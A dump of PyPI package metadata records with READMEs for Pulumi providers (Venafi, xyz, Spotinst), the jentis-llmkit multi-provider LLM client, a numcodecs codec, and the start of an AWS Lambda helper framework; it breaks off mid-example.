- `venafi:url` - (Optional) Venafi URL (e.g. `https://tpp.venafi.example`). It can also be sourced
from the `VENAFI_URL` environment variable.
- `venafi:accessToken` - (Optional) authentication token for the API Application
(applies only to Venafi Platform). It can also be sourced from the `VENAFI_TOKEN` environment variable.
- `venafi:apiKey` - (Optional) REST API key for authentication (applies only to Venafi Cloud).
It can also be sourced from the `VENAFI_API` environment variable.
- `venafi:tppUsername` - (Optional) WebSDK account username for authentication (applies only to Venafi Platform).
It can also be sourced from the `VENAFI_USER` environment variable.
- `venafi:tppPassword` - (Optional) WebSDK account password for authentication (applies only to Venafi Platform).
It can also be sourced from the `VENAFI_PASS` environment variable.
- `venafi:trustBundle` - (Optional) PEM trust bundle for Venafi Platform server certificate.
- `venafi:devMode` - (Optional) When `true` will test the provider without connecting to Venafi Platform or Venafi Cloud.
It can also be sourced from the `VENAFI_DEVMODE` environment variable.
## Reference
For further information, please visit [the Venafi provider docs](https://www.pulumi.com/docs/intro/cloud-providers/venafi)
or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/venafi).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, venafi | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-venafi"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:53:24.702655 | pulumi_venafi-1.13.0a1771570021.tar.gz | 28,862 | 8e/68/f325fb7817ddff02109aa6f1a235c9062ebe5c86c7a0659dcb5bfa5647a7/pulumi_venafi-1.13.0a1771570021.tar.gz | source | sdist | null | false | a56625dcbe6215d042324432ee83dba3 | 71b4f7dcf437a0e81de8394c1dea35eab4e57b76337d45adf7d3558e658991e3 | 8e68f325fb7817ddff02109aa6f1a235c9062ebe5c86c7a0659dcb5bfa5647a7 | null | [] | 222 |
2.4 | pulumi-xyz | 1.0.0a1771569941 | A Pulumi package for creating and managing xyz cloud resources. | # Terraform Bridge Provider Boilerplate
This repository is the template for authoring a Pulumi package from an existing Terraform provider as part of the guide for [authoring and publishing Pulumi packages](https://www.pulumi.com/docs/iac/packages-and-automation/pulumi-packages/authoring/).
This repository is initially set up as a fictitious provider named "xyz" to demonstrate a resource, a data source and configuration derived from the [github.com/pulumi/terraform-provider-xyz provider](https://github.com/pulumi/terraform-provider-xyz).
Read the [setup instructions](SETUP.md) for step-by-step instructions on how to bridge a new provider and refer to our complete docs [guide for authoring and publishing a Pulumi Package](https://www.pulumi.com/docs/iac/packages-and-automation/pulumi-packages/authoring/).
# Xyz Resource Provider
The Xyz Resource Provider lets you manage [Xyz](http://example.com) resources.
## Installing
This package is available for several languages/platforms:
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
```bash
npm install @pulumi/xyz
```
or `yarn`:
```bash
yarn add @pulumi/xyz
```
### Python
To use from Python, install using `pip`:
```bash
pip install pulumi_xyz
```
### Go
To use from Go, use `go get` to grab the latest version of the library:
```bash
go get github.com/pulumi/pulumi-xyz/sdk/go/...
```
### .NET
To use from .NET, install using `dotnet add package`:
```bash
dotnet add package Pulumi.Xyz
```
## Configuration
The following configuration points are available for the `xyz` provider:
- `xyz:region` (environment: `XYZ_REGION`) - the region in which to deploy resources
## Reference
For detailed reference documentation, please visit [the Pulumi registry](https://www.pulumi.com/registry/packages/xyz/api-docs/).
| text/markdown | null | null | null | null | Apache-2.0 | xyz, category/cloud | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://www.pulumi.com",
"Repository, https://github.com/pulumi/pulumi-xyz"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:51:30.528896 | pulumi_xyz-1.0.0a1771569941.tar.gz | 9,944 | af/60/bd81a2fd99258e41726e324275ff37a4c74cdd45e3ed9dfe69b39ec3750e/pulumi_xyz-1.0.0a1771569941.tar.gz | source | sdist | null | false | c0ffe4e841b9e9e3848415e4ce2e900d | f41348cc175210025f356009c56af5f4c00774ce732aca447d7e56210fb5a1ca | af60bd81a2fd99258e41726e324275ff37a4c74cdd45e3ed9dfe69b39ec3750e | null | [] | 214 |
2.4 | pulumi-spotinst | 3.129.0a1771569770 | A Pulumi package for creating and managing spotinst cloud resources. | [](https://github.com/pulumi/pulumi-spotinst/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/spotinst)
[](https://pypi.org/project/pulumi-spotinst)
[](https://badge.fury.io/nu/pulumi.spotinst)
[](https://pkg.go.dev/github.com/pulumi/pulumi-spotinst/sdk/v3/go)
[](https://github.com/pulumi/pulumi-spotinst/blob/master/LICENSE)
# Spotinst Resource Provider
The Spotinst resource provider for Pulumi lets you manage SpotInst resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/spotinst
or `yarn`:
$ yarn add @pulumi/spotinst
### Python
To use from Python, install using `pip`:
$ pip install pulumi_spotinst
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-spotinst/sdk/v3
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Spotinst
## Configuration
The following configuration points are available for the `spotinst` provider:
- `spotinst:account` (environment: `SPOTINST_ACCOUNT`) - the account for `spotinst`
- `spotinst:token` (environment: `SPOTINST_TOKEN`) - the api token for `spotinst`
## Reference
For further information, please visit [the Spotinst provider docs](https://www.pulumi.com/docs/intro/cloud-providers/spotinst) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/spotinst).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, spotinst | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-spotinst"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:50:53.802020 | pulumi_spotinst-3.129.0a1771569770.tar.gz | 462,481 | 0e/7f/3d7e995ec81323e32e98dc90d4c0dbc1172cd22721ab9ec449be9f28ff1f/pulumi_spotinst-3.129.0a1771569770.tar.gz | source | sdist | null | false | 0e5f61fbefe47e7296d3d5df739882c5 | 1c2bd9784a3cd2112a3555df2fbb1da7ffdb3517c2af1ed74026d769e5178be3 | 0e7f3d7e995ec81323e32e98dc90d4c0dbc1172cd22721ab9ec449be9f28ff1f | null | [] | 222 |
2.4 | jentis-llmkit | 1.0.3 | A unified Python interface for multiple Large Language Model (LLM) providers including Google Gemini, Anthropic Claude, OpenAI GPT, xAI Grok, Azure OpenAI, and Ollama | # Jentis LLM Kit
A unified Python interface for multiple Large Language Model (LLM) providers. Access Google Gemini, Anthropic Claude, OpenAI GPT, xAI Grok, Azure OpenAI, and Ollama through a single, consistent API.
## Features
- 🔄 **Unified Interface**: One API for all LLM providers
- 🚀 **Easy to Use**: Simple `init_llm()` function to get started
- 📡 **Streaming Support**: Real-time response streaming for all providers
- 📊 **Token Tracking**: Consistent token usage reporting across providers
- 🔧 **Flexible Configuration**: Provider-specific parameters when needed
- 🛡️ **Error Handling**: Comprehensive exception hierarchy for debugging
## Supported Providers
| Provider | Aliases | Models |
|----------|---------|--------|
| Google Gemini | `google`, `gemini` | gemini-2.0-flash-exp, gemini-1.5-pro, etc. |
| Anthropic Claude | `anthropic`, `claude` | claude-3-5-sonnet-20241022, claude-3-5-haiku-20241022 |
| OpenAI | `openai`, `gpt` | gpt-4o, gpt-4o-mini, gpt-4-turbo |
| xAI Grok | `grok`, `xai` | grok-2-latest, grok-2-vision-latest |
| Azure OpenAI | `azure`, `microsoft` | Your deployment names |
| Ollama Cloud | `ollama-cloud` | llama2, mistral, codellama, etc. |
| Ollama Local | `ollama`, `ollama-local` | Any locally installed model |
| Vertex AI | `vertexai`, `vertex-ai`, `vertex` | Any Vertex AI Model Garden model |
## Installation
```bash
# Install the base package
pip install jentis-llmkit
# Or install with provider-specific dependencies
pip install jentis-llmkit[google] # For Google Gemini
pip install jentis-llmkit[anthropic] # For Anthropic Claude
pip install jentis-llmkit[openai] # For OpenAI, Grok, Azure
pip install jentis-llmkit[ollama] # For Ollama (Cloud & Local)
pip install jentis-llmkit[all] # Install all providers
# Vertex AI requires no pip packages — only gcloud CLI
```
## Quick Start
### Basic Usage
```python
from jentis.llmkit import init_llm
# Initialize OpenAI GPT-4 (requires OpenAI API key)
llm = init_llm(
provider="openai",
model="gpt-4o",
api_key="sk-proj-xxxxxxxxxxxx" # Your OpenAI API key
)
# Generate a response
response = llm.generate_response("What is Python?")
print(response)
```
### Streaming Responses
```python
from jentis.llmkit import init_llm
# Each provider requires its own API key
llm = init_llm(
provider="openai",
model="gpt-4o",
api_key="sk-proj-xxxxxxxxxxxx" # OpenAI-specific key
)
# Stream the response
for chunk in llm.generate_response_stream("Write a short story about AI"):
print(chunk, end='', flush=True)
```
## Provider Examples
### Google Gemini
```python
from jentis.llmkit import init_llm
# Requires Google AI Studio API key
llm = init_llm(
provider="google",
model="gemini-2.0-flash-exp",
api_key="AIzaSyxxxxxxxxxxxxxxxxxxxxxxxxx", # Google API key
temperature=0.7,
max_tokens=1024
)
response = llm.generate_response("Explain quantum computing")
print(response)
```
### Anthropic Claude
```python
from jentis.llmkit import init_llm
# Requires Anthropic API key
llm = init_llm(
provider="anthropic",
model="claude-3-5-sonnet-20241022",
api_key="sk-ant-api03-xxxxxxxxxxxxxxxxx", # Anthropic API key
max_tokens=2048,
temperature=0.8
)
response = llm.generate_response("Write a haiku about programming")
print(response)
```
### OpenAI GPT
```python
from jentis.llmkit import init_llm
# Requires OpenAI API key
llm = init_llm(
provider="openai",
model="gpt-4o",
api_key="sk-proj-xxxxxxxxxxxxxxxxxxxx", # OpenAI API key
temperature=0.9,
max_tokens=1500,
frequency_penalty=0.5,
presence_penalty=0.3
)
response = llm.generate_response("Design a simple REST API")
print(response)
```
### xAI Grok
```python
from jentis.llmkit import init_llm
# Requires xAI API key
llm = init_llm(
provider="grok",
model="grok-2-latest",
api_key="xai-xxxxxxxxxxxxxxxxxxxxxxxx", # xAI API key
temperature=0.7
)
response = llm.generate_response("What's happening in tech?")
print(response)
```
### Azure OpenAI
```python
from jentis.llmkit import init_llm
# Requires Azure OpenAI API key and endpoint
llm = init_llm(
provider="azure",
model="gpt-4o",
api_key="a1b2c3d4e5f6xxxxxxxxxxxx", # Azure API key
azure_endpoint="https://your-resource.openai.azure.com/",
deployment_name="gpt-4o-deployment",
api_version="2024-08-01-preview",
temperature=0.7
)
response = llm.generate_response("Explain Azure services")
print(response)
```
### Ollama Local
```python
from jentis.llmkit import init_llm
# No API key needed for local Ollama
llm = init_llm(
provider="ollama",
model="llama2",
temperature=0.7
)
response = llm.generate_response("Hello, Ollama!")
print(response)
```
### Ollama Cloud
```python
from jentis.llmkit import init_llm
# Requires Ollama Cloud API key
llm = init_llm(
provider="ollama-cloud",
model="llama2",
api_key="ollama_xxxxxxxxxxxxxxxx", # Ollama Cloud API key
host="https://ollama.com"
)
response = llm.generate_response("Explain machine learning")
print(response)
```
### Vertex AI (Model Garden)
```python
from jentis.llmkit import init_llm
# Uses gcloud CLI for authentication (no API key needed)
llm = init_llm(
provider="vertexai",
model="moonshotai/kimi-k2-thinking-maas",
project_id="gen-lang-client-0152852093",
region="global",
temperature=0.6,
max_tokens=8192
)
response = llm.generate_response("What is quantum computing?")
print(response)
```
## Advanced Usage
### Using Function-Based API with Metadata
If you need detailed metadata (token usage, model info), import the provider-specific functions:
```python
from jentis.llmkit.Openai import openai_llm
result = openai_llm(
prompt="What is AI?",
model="gpt-4o",
api_key="sk-proj-xxxxxxxxxxxxxxxxxxxx", # Your OpenAI API key
temperature=0.7
)
print(f"Content: {result['content']}")
print(f"Model: {result['model']}")
print(f"Input tokens: {result['usage']['input_tokens']}")
print(f"Output tokens: {result['usage']['output_tokens']}")
print(f"Total tokens: {result['usage']['total_tokens']}")
```
**Other Providers:**
```python
# Google Gemini
from jentis.llmkit.Google import google_llm
result = google_llm(prompt="...", model="gemini-2.0-flash-exp", api_key="...")
# Anthropic Claude
from jentis.llmkit.Anthropic import anthropic_llm
result = anthropic_llm(prompt="...", model="claude-3-5-sonnet-20241022", api_key="...", max_tokens=1024)
# Grok
from jentis.llmkit.Grok import grok_llm
result = grok_llm(prompt="...", model="grok-2-latest", api_key="...")
# Azure OpenAI
from jentis.llmkit.Microsoft import azure_llm
result = azure_llm(prompt="...", deployment_name="gpt-4o", azure_endpoint="...", api_key="...")
# Ollama Cloud
from jentis.llmkit.Ollamacloud import ollama_cloud_llm
result = ollama_cloud_llm(prompt="...", model="llama2", api_key="...")
# Ollama Local
from jentis.llmkit.Ollamalocal import ollama_local_llm
result = ollama_local_llm(prompt="...", model="llama2")
# Vertex AI
from jentis.llmkit.Vertexai import vertexai_llm
result = vertexai_llm(prompt="...", model="google/gemini-2.0-flash", project_id="my-project")
```
**Streaming with Functions:**
```python
from jentis.llmkit.Openai import openai_llm_stream
for chunk in openai_llm_stream(
prompt="Write a story",
model="gpt-4o",
api_key="sk-proj-xxxxxxxxxxxxxxxxxxxx"
):
print(chunk, end='', flush=True)
```
### Custom Configuration
```python
from jentis.llmkit import init_llm
llm = init_llm(
provider="openai",
model="gpt-4o",
api_key="sk-proj-xxxxxxxxxxxxxxxxxxxx", # Your OpenAI API key
temperature=0.8,
top_p=0.9,
max_tokens=2000,
max_retries=5,
timeout=60.0,
backoff_factor=1.0,
frequency_penalty=0.5,
presence_penalty=0.3
)
```
## Parameters
### Common Parameters
All providers support these parameters:
| Parameter | Type | Default | Description |
|-----------|------|---------|-------------|
| `provider` | str | **Required** | Provider name or alias |
| `model` | str | **Required** | Model identifier |
| `api_key` | str | None | API key (env var if not provided) |
| `temperature` | float | None | Randomness (0.0-2.0) |
| `top_p` | float | None | Nucleus sampling (0.0-1.0) |
| `max_tokens` | int | None | Maximum tokens to generate |
| `timeout` | float | 30.0 | Request timeout (seconds) |
| `max_retries` | int | 3 | Retry attempts |
| `backoff_factor` | float | 0.5 | Exponential backoff factor |
### Provider-Specific Parameters
**OpenAI & Grok:**
- `frequency_penalty`: Penalty for token frequency (0.0-2.0)
- `presence_penalty`: Penalty for token presence (0.0-2.0)
**Azure OpenAI:**
- `azure_endpoint`: Azure endpoint URL (**Required**)
- `deployment_name`: Deployment name (defaults to model)
- `api_version`: API version (default: "2024-08-01-preview")
**Ollama (Cloud & Local):**
- `host`: Host URL (Cloud: "https://ollama.com", Local: "http://localhost:11434")
## Environment Variables
**Each provider uses its own environment variable for API keys.** Set them to avoid hardcoding:
```bash
# Google Gemini
export GOOGLE_API_KEY="AIzaSyxxxxxxxxxxxxxxxxxxxxxxxxx"
# Anthropic Claude
export ANTHROPIC_API_KEY="sk-ant-api03-xxxxxxxxxxxxxxxxx"
# OpenAI
export OPENAI_API_KEY="sk-proj-xxxxxxxxxxxxxxxxxxxx"
# xAI Grok
export XAI_API_KEY="xai-xxxxxxxxxxxxxxxxxxxxxxxx"
# Azure OpenAI
export AZURE_OPENAI_API_KEY="a1b2c3d4e5f6xxxxxxxxxxxx"
export AZURE_OPENAI_ENDPOINT="https://your-resource.openai.azure.com/"
# Ollama Cloud
export OLLAMA_API_KEY="ollama_xxxxxxxxxxxxxxxx"
# Vertex AI (uses gcloud auth, or set token explicitly)
export VERTEX_AI_ACCESS_TOKEN="ya29.xxxxx..."
export VERTEX_AI_PROJECT_ID="your-project-id"
```
Then initialize without api_key parameter:
```python
from Jentis.llmkit import init_llm
# OpenAI - reads from OPENAI_API_KEY environment variable
llm = init_llm(provider="openai", model="gpt-4o")
# Google - reads from GOOGLE_API_KEY environment variable
llm = init_llm(provider="google", model="gemini-2.0-flash-exp")
# Anthropic - reads from ANTHROPIC_API_KEY environment variable
llm = init_llm(provider="anthropic", model="claude-3-5-sonnet-20241022")
# Vertex AI - reads from VERTEX_AI_PROJECT_ID, authenticates via gcloud
llm = init_llm(provider="vertexai", model="google/gemini-2.0-flash")
```
## Methods
All initialized LLM instances have two methods:
### `generate_response(prompt: str) -> str`
Generate a complete response.
```python
response = llm.generate_response("Your prompt here")
print(response) # String output
```
### `generate_response_stream(prompt: str) -> Generator`
Stream the response in real-time.
```python
for chunk in llm.generate_response_stream("Your prompt here"):
print(chunk, end='', flush=True)
```
## Error Handling
```python
from jentis.llmkit import init_llm
try:
llm = init_llm(
provider="openai",
model="gpt-4o",
api_key="sk-invalid-key-xxxxxxxxxx" # Wrong API key
)
response = llm.generate_response("Test")
except ValueError as e:
print(f"Invalid configuration: {e}")
except Exception as e:
print(f"API Error: {e}")
```
Each provider has its own exception hierarchy for detailed error handling. Import from provider modules:
```python
from jentis.llmkit.Openai import (
OpenAILLMError,
OpenAILLMAPIError,
OpenAILLMImportError,
OpenAILLMResponseError
)
try:
from jentis.llmkit.Openai import openai_llm
result = openai_llm(prompt="Test", model="gpt-4o", api_key="invalid")
except OpenAILLMAPIError as e:
print(f"API Error: {e}")
except OpenAILLMError as e:
print(f"General Error: {e}")
```
## Complete Example
```python
from jentis.llmkit import init_llm
def chat_with_llm(provider_name: str, user_message: str):
"""Simple chat function supporting multiple providers."""
try:
# Initialize LLM
llm = init_llm(
provider=provider_name,
model="gpt-4o" if provider_name == "openai" else "llama2",
api_key=None, # Uses environment variables
temperature=0.7,
max_tokens=1024
)
# Stream response
print(f"\n{provider_name.upper()} Response:\n")
for chunk in llm.generate_response_stream(user_message):
print(chunk, end='', flush=True)
print("\n")
except ValueError as e:
print(f"Configuration error: {e}")
except Exception as e:
print(f"Error: {e}")
# Use different providers
chat_with_llm("openai", "What is machine learning?")
chat_with_llm("anthropic", "Explain neural networks")
chat_with_llm("ollama", "What is Python?")
```
## Contributing
Contributions are welcome! Please feel free to submit a Pull Request. For major changes, please open an issue first to discuss what you would like to change.
1. Fork the repository
2. Create your feature branch (`git checkout -b feature/amazing-feature`)
3. Commit your changes (`git commit -m 'Add some amazing feature'`)
4. Push to the branch (`git push origin feature/amazing-feature`)
5. Open a Pull Request
## License
This project is licensed under the terms of the [LICENSE](../../LICENSE) file.
## Support
- **Issues**: [GitHub Issues](https://github.com/devXjitin/jentis-llmkit/issues)
- **Documentation**: [Project Docs](https://github.com/devXjitin/jentis-llmkit)
- **Community**: [Discussions](https://github.com/devXjitin/jentis-llmkit/discussions)
## Author
Built with care by the **J.E.N.T.I.S** team.
| text/markdown | J.E.N.T.I.S Team | null | null | null | MIT | llm, ai, openai, anthropic, google, gemini, claude, grok, ollama, azure, vertex-ai, chatgpt, gpt-4, machine-learning, nlp | [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development :: Libraries :: Python Modules",
"Typing :: Typed"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"google-generativeai>=0.3.0; extra == \"google\"",
"anthropic>=0.18.0; extra == \"anthropic\"",
"openai>=1.0.0; extra == \"openai\"",
"ollama>=0.1.0; extra == \"ollama\"",
"google-generativeai>=0.3.0; extra == \"all\"",
"anthropic>=0.18.0; extra == \"all\"",
"openai>=1.0.0; extra == \"all\"",
"ollama>=0.1.0; extra == \"all\"",
"google-generativeai>=0.3.0; extra == \"cloud\"",
"anthropic>=0.18.0; extra == \"cloud\"",
"openai>=1.0.0; extra == \"cloud\"",
"pytest>=7.0; extra == \"dev\"",
"black>=22.0; extra == \"dev\"",
"mypy>=0.990; extra == \"dev\"",
"ruff>=0.0.270; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/devXjitin/jentis-llmkit",
"Documentation, https://github.com/devXjitin/jentis-llmkit",
"Repository, https://github.com/devXjitin/jentis-llmkit",
"Bug Tracker, https://github.com/devXjitin/jentis-llmkit/issues",
"Discussions, https://github.com/devXjitin/jentis-llmkit/discussions"
] | twine/6.2.0 CPython/3.13.11 | 2026-02-20T06:50:41.186544 | jentis_llmkit-1.0.3.tar.gz | 42,388 | 7d/67/ba3f4dd4bde19584c90dbb56576e2f7e8c893cd9e0eef856333e320db520/jentis_llmkit-1.0.3.tar.gz | source | sdist | null | false | f95d1acd063eec45fb2ba8675b8e3209 | b1959063c8b227e8296e2f80dc0a921c6a34149fa4512327bda287a7c80fd08b | 7d67ba3f4dd4bde19584c90dbb56576e2f7e8c893cd9e0eef856333e320db520 | null | [] | 230 |
2.4 | numcodecs-pw-ratio | 0.2.0 | Meta codec for bounding the pointwise ratio error for the `numcodecs` buffer compression API | [](https://github.com/juntyr/numcodecs-pw-ratio/actions/workflows/ci.yml?query=branch%3Amain)
[](https://pypi.python.org/pypi/numcodecs-pw-ratio)
[](https://github.com/juntyr/numcodecs-pw-ratio/blob/main/LICENSE)
[](https://pypi.python.org/pypi/numcodecs-pw-ratio)
[](https://numcodecs-pw-ratio.readthedocs.io/en/latest/?badge=latest)
# numcodecs-pw-ratio
Meta codec for bounding the pointwise ratio error in the [`numcodecs`] buffer compression API.
[`numcodecs`]: https://numcodecs.readthedocs.io/en/stable/
## License
Licensed under the Mozilla Public License, Version 2.0 ([LICENSE](LICENSE) or https://www.mozilla.org/en-US/MPL/2.0/).
## Funding
The `numcodecs-pw-ratio` package has been developed as part of [ESiWACE3](https://www.esiwace.eu), the third phase of the Centre of Excellence in Simulation of Weather and Climate in Europe.
Funded by the European Union. This work has received funding from the European High Performance Computing Joint Undertaking (JU) under grant agreement No 101093054.
| text/markdown | null | null | null | null | null | null | [] | [] | null | null | >=3.10 | [] | [] | [] | [
"leb128~=1.0.8",
"numcodecs-combinators~=0.2.13",
"numcodecs<0.17,>=0.13.0",
"numpy~=2.0",
"typing-extensions~=4.6"
] | [] | [] | [] | [] | uv/0.10.4 {"installer":{"name":"uv","version":"0.10.4","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true} | 2026-02-20T06:50:29.577747 | numcodecs_pw_ratio-0.2.0-py3-none-any.whl | 12,839 | 6d/30/bee041b225b6e43c9cfe984022c7aceebb79b064ef79b52f08c58fcd886d/numcodecs_pw_ratio-0.2.0-py3-none-any.whl | py3 | bdist_wheel | null | false | 105493ebf336f9542d0d630843125523 | 71d53feb30debc563c89fbe2fb7054465d6e488efba1a7f79c0baef14ae45010 | 6d30bee041b225b6e43c9cfe984022c7aceebb79b064ef79b52f08c58fcd886d | MPL-2.0 | [
"LICENSE"
] | 272 |
2.4 | aws-python-helper | 0.29.0 | AWS Python Helper Framework | # AWS Python Framework
Mini-framework to create REST APIs, SQS Consumers, SNS Publishers, Fargate Tasks, and Standalone Lambdas with Python in AWS Lambda.
## 🚀 Features
- **Reusable single handler**: A single handler for all your API routes
- **Dynamic controller loading**: Routing based on convention
- **OOP structure**: Object-oriented programming for your code
- **Flexible MongoDB**: Direct access to multiple databases without models
- **SQS Consumers**: Same pattern to process SQS messages
- **SNS Publishers**: Same pattern to publish messages to SNS topics
- **Fargate Tasks**: Same pattern to run tasks in Fargate containers
- **Standalone Lambdas**: Create lambdas invocable directly with AWS SDK
- **Type hints**: Modern Python with type annotations
- **Async/await**: Full support for asynchronous operations
## 🔧 Installation
```bash
# Install dependencies
pip install -r requirements.txt
# Configure MongoDB URI
export MONGODB_URI="mongodb://localhost:27017"
```
## 📂 Project Structure
This framework follows a convention-based folder structure. Here's the recommended organization:
```
your-project/
└── src/
├── api/ # REST APIs
│ └── users/ # Resource folder (kebab-case)
│ ├── get.py # GET /users/123 -> UserGetAPI
│ ├── list.py # GET /users -> UserListAPI
│ ├── post.py # POST /users -> UserPostAPI
│ ├── put.py # PUT /users/123 -> UserPutAPI
│ └── delete.py # DELETE /users/123 -> UserDeleteAPI
│
├── consumer/ # SQS Consumers (direct files)
│ ├── user_created.py # user-created -> UserCreatedConsumer
│ ├── title_indexed.py # title-indexed -> TitleIndexedConsumer
│ └── order_processed.py # order-processed -> OrderProcessedConsumer
│
├── lambda/ # Standalone Lambdas (folders)
│ ├── generate-route/ # generate-route -> GenerateRouteLambda
│ │ └── main.py
│ ├── sync-carrier/ # sync-carrier -> SyncCarrierLambda
│ │ └── main.py
│ └── process-payment/ # process-payment -> ProcessPaymentLambda
│ └── main.py
│
└── task/ # Fargate Tasks (folders)
├── search-tax-by-town/ # search-tax-by-town -> SearchTaxByTownTask
│ ├── main.py # Entry point
│ └── task.py # Task class
└── process-data/ # process-data -> ProcessDataTask
├── main.py
└── task.py
```
### Naming Conventions
The framework uses automatic class name detection based on your folder/file structure:
| Type | Handler Name | File Path | Class Name |
|------|--------------|-----------|------------|
| **API** | N/A | `src/api/users/list.py` | `UsersListAPI` |
| **Consumer** | `user-created` | `src/consumer/user_created.py` | `UserCreatedConsumer` |
| **Lambda** | `generate-route` | `src/lambda/generate-route/main.py` | `GenerateRouteLambda` |
| **Task** | `search-tax-by-town` | `src/task/search-tax-by-town/task.py` | `SearchTaxByTownTask` |
**Rules:**
- Handler names use **kebab-case** (e.g., `user-created`, `generate-route`)
- Consumer files use **snake_case** (e.g., `user_created.py`)
- Lambda folders use **kebab-case** (e.g., `generate-route/`)
- Task folders use **kebab-case** (e.g., `search-tax-by-town/`)
- Class names always use **PascalCase** with suffix (e.g., `UserCreatedConsumer`)
## 📝 Basic Usage
### Create an Endpoint
**1. Create your API class** in `src/api/constitutions/list.py`:
```python
from aws_python_helper.api.base import API
class ConstitutionListAPI(API):
async def process(self):
# Direct access to MongoDB
constitutions = await self.db.constitution_db.constitutions.find().to_list(100)
self.set_body(constitutions)
```
**2. The routing is automatic:**
- `GET /constitutions` → `src/api/constitutions/list.py`
- `GET /constitutions/123` → `src/api/constitutions/get.py`
- `POST /constitutions` → `src/api/constitutions/post.py`
**3. Configure the generic handler** (`src/handlers/api_handler.py`):
```python
from aws_python_helper.api.handler import api_handler
handler = api_handler
```
### Create an SQS Consumer
**1. Create your consumer** in `src/consumer/title_indexed.py`:
```python
from aws_python_helper.sqs.consumer_base import SQSConsumer
class TitleIndexedConsumer(SQSConsumer):
async def process_record(self, record):
body = self.parse_body(record)
# Your logic here
await self.db.constitution_db.titles.insert_one(body)
```
**2. Configure the handler** in `src/handlers/sqs_handler.py`:
```python
from aws_python_helper.sqs.handler import sqs_handler
# Create a handler for each consumer and export it
title_indexed_handler = sqs_handler('title-indexed')
__all__ = ['title_indexed_handler']
```
### Create a Standalone Lambda
Standalone lambdas are functions that can be invoked directly using the AWS SDK, without an HTTP endpoint. They're perfect for internal operations, integrations, and background processing tasks.
**Differences with APIs:**
- No API Gateway - invoked directly with AWS SDK
- No HTTP methods or routing
- Can be called from other lambdas, Step Functions, or any AWS service
- Perfect for internal microservices communication
**1. Create your lambda class** in `src/lambda/generate-route/main.py`:
```python
from aws_python_helper.lambda_standalone.base import Lambda
from datetime import datetime
class GenerateRouteLambda(Lambda):
async def validate(self):
# Validate input data
if 'shipping_id' not in self.data:
raise ValueError("shipping_id is required")
if not isinstance(self.data['shipping_id'], str):
raise TypeError("shipping_id must be a string")
async def process(self):
# Your business logic here
shipping_id = self.data['shipping_id']
# Access to MongoDB
shipping = await self.db.deliveries.shippings.find_one(
{'_id': shipping_id}
)
if not shipping:
raise ValueError(f"Shipping {shipping_id} not found")
# Create route
route = {
'shipping_id': shipping_id,
'carrier_id': shipping.get('carrier_id'),
'status': 'pending',
'created_at': datetime.utcnow()
}
result = await self.db.deliveries.routes.insert_one(route)
self.logger.info(f"Route created: {result.inserted_id}")
# Return result
return {
'route_id': str(result.inserted_id),
'shipping_id': shipping_id
}
```
**2. Configure the handler** in `src/handlers/lambda_handler.py`:
```python
from aws_python_helper.lambda_standalone.handler import lambda_handler
# Create a handler for each lambda and export it
generate_route_handler = lambda_handler('generate-route')
sync_carrier_handler = lambda_handler('sync-carrier')
process_payment_handler = lambda_handler('process-payment')
__all__ = [
'generate_route_handler',
'sync_carrier_handler',
'process_payment_handler'
]
```
**Note:** The handler name `'generate-route'` (kebab-case) will automatically look for:
- Folder: `src/lambda/generate-route/` (kebab-case)
- File: `main.py`
- Class: `GenerateRouteLambda`
**3. Invoke from another Lambda or API** using boto3:
```python
import boto3
import json
lambda_client = boto3.client('lambda')
# Invoke synchronously (RequestResponse)
response = lambda_client.invoke(
FunctionName='GenerateRouteLambda',
InvocationType='RequestResponse',
Payload=json.dumps({
'data': {
'shipping_id': '507f1f77bcf86cd799439011'
}
})
)
result = json.loads(response['Payload'].read())
# {'success': True, 'data': {'route_id': '...', 'shipping_id': '...'}}
if result['success']:
print(f"Route created: {result['data']['route_id']}")
else:
print(f"Error: {result['error']}")
```
**4. Invoke asynchronously** (fire and forget):
```python
# Invoke asynchronously (Event)
lambda_client.invoke(
FunctionName='GenerateRouteLambda',
InvocationType='Event', # Asynchronous
Payload=json.dumps({
'data': {
'shipping_id': '507f1f77bcf86cd799439011'
